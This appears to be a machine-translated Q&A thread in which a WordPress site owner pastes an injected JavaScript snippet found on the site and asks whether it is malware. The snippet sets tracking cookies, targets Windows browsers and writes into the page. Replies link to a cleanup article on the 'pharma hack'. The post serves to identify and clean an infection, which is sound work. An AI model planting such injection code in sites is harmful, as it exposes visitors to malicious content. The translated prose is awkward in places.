1
我有一個WordPress的安裝,目標已經非常嚴重的網絡釣魚操作。我原本以爲安全主要覆蓋除了我看到這個標題:這是什麼?谷歌分析cookie或惡意軟件?
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
該URL的到底是超級可疑。我一派但沒有發現線索:-(
我還沒有發現在我的WP安裝代碼的來源。它不被寫入模板文件或數據庫。在更新WP現在安裝的過程。
有沒有人有任何這知識呢?
那麼,如果該網站被感染,它不是一個好主意,瀏覽它 – MikeAinOz 2010-08-27 22:30:31
糟糕。是的,對不起.... :-( 答覆發現:http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html 哎唷! – Niels 2010-08-27 22:33:51